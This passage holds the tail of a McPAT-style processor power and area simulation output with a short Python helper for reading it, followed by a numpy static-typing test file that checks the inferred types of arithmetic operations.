'Peak Dynamic': 15.8255,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.129283,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0071364,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0602474,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.196667,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.79122,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0348609,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.23007,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.18129,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0964648,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.155594,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0785387,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.330598,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0825324,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.30767,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0342495,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00404617,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0425933,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0299239,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0768429,
'Execution Unit/Register Files/Runtime Dynamic': 0.0339701,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0984494,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.229242,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.22926,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000605369,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000605369,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000548496,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000223938,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000429859,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00218909,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00504606,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0287666,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.8298,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0790572,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0977043,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.13712,
'Instruction Fetch Unit/Runtime Dynamic': 0.212763,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.033966,
'L2/Runtime Dynamic': 0.00647773,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.18981,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.466498,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0308219,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0308218,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.33536,
'Load Store Unit/Runtime Dynamic': 0.649322,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0760015,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.152002,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0269732,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0274533,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.11377,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0130488,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.316214,
'Memory Management Unit/Runtime Dynamic': 0.0405021,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.7198,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0900952,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00544867,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0473959,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.14294,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.28126,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 6.118045548428725,
'Runtime Dynamic': 6.118045548428725,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.283309,
'Runtime Dynamic': 0.085314,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 73.5088,
'Peak Power': 106.621,
'Runtime Dynamic': 15.5123,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 73.2255,
'Total Cores/Runtime Dynamic': 15.4269,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.283309,
'Total L3s/Runtime Dynamic': 0.085314,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
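The flat keys above use '/'-separated component paths, and each unit's own entry already aggregates its sub-blocks (e.g. 'Execution Unit/Runtime Dynamic' covers the ALUs, register files, and scheduler beneath it). A minimal sketch of extracting the per-unit value of one metric from such a dict — the `unit_totals` helper and the small `power` sample are illustrative, not part of the dataset:

```python
def unit_totals(power, metric):
    """Return each top-level unit's value for one metric.

    In McPAT-style output a depth-1 key ('<Unit>/<metric>') already
    aggregates that unit's sub-blocks, so deeper keys are skipped to
    avoid double counting.
    """
    suffix = '/' + metric
    return {
        key[:-len(suffix)]: value
        for key, value in power.items()
        if key.endswith(suffix) and key.count('/') == 1
    }

# Illustrative subset of the values above.
power = {
    'Execution Unit/Runtime Dynamic': 1.22926,
    'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
    'L2/Runtime Dynamic': 0.00647773,
    'Runtime Dynamic': 2.28126,
}
print(unit_totals(power, 'Runtime Dynamic'))
# {'Execution Unit': 1.22926, 'L2': 0.00647773}
```

The depth filter is the key design choice: summing every matching key would count each unit twice, once via its own total and once via its children.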
# numpy/typing/tests/data/reveal/arithmetic.py
# from takanori-pskq/numpy @ ae7f9a2cb71cccc9d49cd343e238464107397814 (BSD-3-Clause)

import numpy as np
c16 = np.complex128()
f8 = np.float64()
i8 = np.int64()
u8 = np.uint64()
c8 = np.complex64()
f4 = np.float32()
i4 = np.int32()
u4 = np.uint32()
dt = np.datetime64(0, "D")
td = np.timedelta64(0, "D")
b_ = np.bool_()
b = bool()
c = complex()
f = float()
i = int()
AR = np.array([0], dtype=np.float64)
AR.setflags(write=False)
# unary ops
reveal_type(-c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(-c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(-f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(-f4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(-i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(-i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(-u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(-u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(-td) # E: numpy.timedelta64
reveal_type(-AR) # E: Union[numpy.ndarray*, numpy.generic]
reveal_type(+c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(+c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(+f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(+f4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(+i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(+i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(+u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(+u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(+td) # E: numpy.timedelta64
reveal_type(+AR) # E: Union[numpy.ndarray*, numpy.generic]
reveal_type(abs(c16)) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(abs(c8)) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(abs(f8)) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(abs(f4)) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(abs(i8)) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(abs(i4)) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(abs(u8)) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(abs(u4)) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(abs(td)) # E: numpy.timedelta64
reveal_type(abs(b_)) # E: numpy.bool_
reveal_type(abs(AR)) # E: Union[numpy.ndarray*, numpy.generic]
# Time structures
reveal_type(dt + td) # E: numpy.datetime64
reveal_type(dt + i) # E: numpy.datetime64
reveal_type(dt + i4) # E: numpy.datetime64
reveal_type(dt + i8) # E: numpy.datetime64
reveal_type(dt - dt) # E: numpy.timedelta64
reveal_type(dt - i) # E: numpy.datetime64
reveal_type(dt - i4) # E: numpy.datetime64
reveal_type(dt - i8) # E: numpy.datetime64
reveal_type(td + td) # E: numpy.timedelta64
reveal_type(td + i) # E: numpy.timedelta64
reveal_type(td + i4) # E: numpy.timedelta64
reveal_type(td + i8) # E: numpy.timedelta64
reveal_type(td - td) # E: numpy.timedelta64
reveal_type(td - i) # E: numpy.timedelta64
reveal_type(td - i4) # E: numpy.timedelta64
reveal_type(td - i8) # E: numpy.timedelta64
reveal_type(td / f) # E: numpy.timedelta64
reveal_type(td / f4) # E: numpy.timedelta64
reveal_type(td / f8) # E: numpy.timedelta64
reveal_type(td / td) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(td // td) # E: numpy.signedinteger[numpy.typing._64Bit]
# boolean
reveal_type(b_ / b) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / i) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / i8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / i4) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / u8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / u4) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / f) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / f4) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(b_ / c) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(b_ / c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(b_ / c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(b / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(b_ / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i8 / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(i4 / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(u8 / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(u4 / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 / b_) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f4 / b_) # E: numpy.floating[numpy.typing._32Bit]
reveal_type(c / b_) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 / b_) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c8 / b_) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
# Complex
reveal_type(c16 + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + f8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + i8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + c8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + f4) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + i4) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + b_) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + b) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + c) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + f) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c16 + i) # E: numpy.complexfloating[Any, Any]
reveal_type(c16 + AR) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(c16 + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f8 + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(i8 + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c8 + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f4 + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(i4 + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(b_ + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(b + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(i + c16) # E: numpy.complexfloating[Any, Any]
reveal_type(AR + c16) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(c8 + c16) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c8 + f8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c8 + i8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c8 + c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(c8 + f4) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(c8 + i4) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(c8 + b_) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(c8 + b) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(c8 + c) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c8 + f) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c8 + i) # E: numpy.complexfloating[Any, Any]
reveal_type(c8 + AR) # E: Union[numpy.ndarray, numpy.generic]
reveal_type(c16 + c8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f8 + c8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(i8 + c8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(c8 + c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(f4 + c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(i4 + c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(b_ + c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(b + c8) # E: numpy.complexfloating[numpy.typing._32Bit, numpy.typing._32Bit]
reveal_type(c + c8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(f + c8) # E: numpy.complexfloating[numpy.typing._64Bit, numpy.typing._64Bit]
reveal_type(i + c8) # E: numpy.complexfloating[Any, Any]
reveal_type(AR + c8) # E: Union[numpy.ndarray, numpy.generic]
# Float
reveal_type(f8 + f8) # E: numpy.floating[numpy.typing._64Bit]
reveal_type(f8 + i8) # E: numpy.floating[numpy.typing._64Bit]
